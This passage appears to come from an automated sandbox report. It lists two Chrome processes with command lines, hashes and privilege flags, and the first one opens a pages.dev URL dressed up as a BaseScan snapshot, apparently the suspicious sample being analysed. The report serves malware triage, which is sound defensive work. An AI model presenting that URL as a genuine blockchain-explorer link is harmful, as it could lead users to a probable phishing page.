                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/"
                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:21:16:59
                                                                                                                                                                                                                                              Start date:27/09/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              No disassembly